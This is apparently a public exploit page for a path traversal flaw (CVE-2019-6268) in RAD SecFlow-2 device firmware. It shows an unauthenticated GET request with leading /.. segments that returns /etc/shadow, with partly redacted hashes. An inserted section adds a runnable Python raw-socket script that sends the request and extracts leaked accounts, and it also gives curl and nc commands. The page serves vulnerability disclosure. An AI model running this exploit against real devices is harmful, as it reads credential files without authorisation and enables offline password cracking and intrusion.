## https://sploitus.com/exploit?id=PACKETSTORM:177440
# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63  
# Date: 3/2024  
# CVE: CVE-2019-6268  
# Exploit Author: Branko Milicevic  
  
The embedded web server on RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 does not reject request URIs that begin with /.., so the path escapes the web root (Directory Traversal), as demonstrated by reading /etc/shadow.  
  
Steps to reproduce:  
  
Request:  
GET /../../../../../../../../../../etc/shadow HTTP/1.1  
  
Response:  
HTTP/1.1 200 OK  
  
root:nDnjJ****ydh3:11851:0:99999:7:::  
bin:*:11851:0:99999:7:::  
daemon:*:11851:0:99999:7:::  
adm:*:11851:0:99999:7:::  
lp:*:11851:0:99999:7:::  
sync:*:11851:0:99999:7:::  
shutdown:*:11851:0:99999:7:::  
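The reproduction above as a runnable check. This is an added example written by the editor, not part of the original advisory; it sends the request line byte-for-byte over a plain socket (HTTP libraries and browsers normalise away the leading /.. segments before the bytes leave the client, which makes the device look patched when it is not) and decides from the response whether /etc/shadow came back. The target host and port are assumed parameters; the sample responses at the bottom are constructed for the self-test and mirror the redacted output quoted above.

```python
"""Raw-socket probe for the /.. traversal shown in the advisory, plus a
parser that decides whether the response body is /etc/shadow.  Added
example by the editor; host/port are assumed parameters, and the sample
responses below are constructed for the self-test."""
from __future__ import annotations

import re
import socket

# Copied verbatim from the advisory's request line.
TRAVERSAL_PATH = "/../../../../../../../../../../etc/shadow"

# One /etc/shadow record: user name followed by exactly eight colon-separated
# fields (hash, last change, min, max, warn, inactive, expire, reserved).
SHADOW_LINE = re.compile(r"^[a-z_][a-z0-9_-]*(:[^:\n]*){8}$", re.M)


def build_request(path: str, host: str) -> bytes:
    """Serialise the request without touching the path.

    The path is placed in the request line as-is, so "/../" segments reach
    the server instead of being collapsed client-side.  HTTP/1.1 requires a
    Host header; Connection: close lets the caller read until EOF.
    """
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def split_response(raw: bytes) -> tuple[int, bytes]:
    """Return (status code, body) from a raw HTTP/1.x response; status 0 if unparsable."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    parts = status_line.split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    return status, body


def shadow_users(body: bytes) -> list[str]:
    """User names of every line in body that has the shape of a shadow record."""
    text = body.decode("latin-1", "replace")
    return [m.group(0).split(":", 1)[0] for m in SHADOW_LINE.finditer(text)]


def assess(raw: bytes) -> tuple[int, list[str]]:
    """Status code plus the accounts leaked; vulnerable if 200 and the list is non-empty."""
    status, body = split_response(raw)
    users = shadow_users(body) if status == 200 else []
    return status, users


def probe(host: str, port: int = 80, timeout: float = 10.0) -> tuple[int, list[str]]:
    """Send the traversal request to a live device and assess the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(TRAVERSAL_PATH, host))
        chunks = []
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return assess(b"".join(chunks))


# Constructed sample: the advisory's (redacted) response, for the self-test.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"root:nDnjJ****ydh3:11851:0:99999:7:::\n"
    b"bin:*:11851:0:99999:7:::\n"
    b"daemon:*:11851:0:99999:7:::\n"
)

# Constructed sample of a negative result (assumed shape of a patched device's reply).
SAMPLE_NOT_VULNERABLE = (
    b"HTTP/1.1 404 Not Found\r\n\r\n<html><body>Not Found</body></html>\n"
)

if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        status, users = probe(sys.argv[1], port)
    else:
        status, users = assess(SAMPLE_RESPONSE)
    print(f"HTTP {status}; shadow records for: {users or 'none'}")
```

Run it as `python3 probe.py <device-ip> [port]`; with no arguments it checks the constructed sample. The same caveat applies to manual testing: use `curl --path-as-is 'http://<device>/../../../../../../../../../../etc/shadow'` (the flag stops curl from squashing the dot segments), or a raw `nc` session, rather than a browser or a client library that normalises the URL.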

Vulnerability Type  
Directory Traversal  
  
Attack Vectors  
An unauthenticated remote attacker can send a crafted request to read arbitrary files from the device's filesystem, including /etc/shadow, a file that is normally readable only by root. The leaked password hashes (partially redacted above) can then be cracked offline.  
  
Reference  
https://www.owasp.org/index.php/Path_Traversal